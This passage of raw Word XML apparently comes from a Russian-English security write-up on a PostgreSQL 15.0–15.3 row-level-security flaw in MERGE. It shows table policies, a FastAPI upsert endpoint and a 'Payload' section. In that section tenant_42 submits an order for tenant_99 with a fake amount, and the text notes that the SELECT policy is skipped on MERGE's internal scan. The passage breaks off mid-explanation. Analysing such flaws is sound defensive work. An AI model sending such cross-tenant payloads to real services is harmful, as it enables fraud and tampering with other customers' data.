          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    tenant_id int NOT NULL,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    status text,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    amount numeric</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ALTER TABLE app.orders ENABLE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INSERT policy: можно вставлять только в свой tenant</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CREATE POLICY orders_insert ON app.orders FOR INSERT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    WITH CHECK (tenant_id = current_setting('jwt.tenant_id')::int);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UPDATE policy: можно обновлять только свои rows</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CREATE POLICY orders_update ON app.orders FOR UPDATE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    USING (tenant_id = current_setting('jwt.tenant_id')::int)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    WITH CHECK (tenant_id = current_setting('jwt.tenant_id')::int);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policy: видны только свои rows</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CREATE POLICY orders_select ON app.orders FOR SELECT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    USING (tenant_id = current_setting('jwt.tenant_id')::int);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Роль tenant_42 — обычный multi-tenant access</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">GRANT INSERT, UPDATE, SELECT ON app.orders TO tenant_42;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Application использует MERGE для upsert-операций:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># app/api/v1/orders.py</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">@router.post("/orders/upsert")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">async def upsert_order(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    order: OrderPayload,</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Depends(get_tenant_session),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MERGE для idempotent upsert</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w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        MERGE INTO app.orders AS t</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        USING (VALUES (:id, :tenant_id, :status, :amount))</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">              AS s(id, tenant_id, status, amount)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            ON t.id = s.id</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        WHEN MATCHED THEN UPDATE SET status = s.status, amount = s.amount</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        WHEN NOT MATCHED THEN INSERT (id, tenant_id, status, amount)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            VALUES (s.id, s.tenant_id, s.status, s.amount);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    """), {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        "id": order.id, "tenant_id": order.tenant_id,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        "status": order.status, "amount": order.amount,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{"status": "ok"}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">current_setting('jwt.tenant_id')</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> устанавливается из JWT-claim в session-middleware. RLS policies должны гарантировать, что tenant 42 не сможет ни читать, ни писать в orders с tenant_id != 42.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload — write to other tenant через MERGE INSERT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Сценарий</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: tenant_42 хочет создать order для tenant_99 (например, financial fraud или sabotage).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">POST /orders/upsert (JWT tenant_42)</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"id": 12345,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    "tenant_id": 99,            ← чужой tenant</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    "status": "completed",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    "amount": 999999.00</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Application middleware устанавливает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SET jwt.tenant_id = '42'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (current tenant from JWT). MERGE отправляется в PG. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">В PG 15.0–15.3:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- Сервер видит (с current_user = tenant_42, jwt.tenant_id = 42):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">MERGE INTO app.orders AS t</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">USING (VALUES (12345, 99, 'completed', 999999.00))</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">      AS s(id, tenant_id, status, amount)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    ON t.id = s.id</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WHEN MATCHED THEN UPDATE SET ...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WHEN NOT MATCHED THEN INSERT (id, tenant_id, status, amount)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    VALUES (s.id, s.tenant_id, s.status, s.amount);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">PG 15.0–15.3 baseline behavior:</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ON-condition (`t.id = s.id`)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> требует SELECT на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">app.orders</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> для проверки existing rows.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">2. PG 15.0–15.3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">НЕ применял SELECT policy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> на этот internal scan — атакующий «видит» все orders в БД, не только свои.</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WHEN NOT MATCHED — INSERT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> применяет INSERT WITH CHECK policy (правильно): </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">tenant_id = 42</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Payload tenant_id=99 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
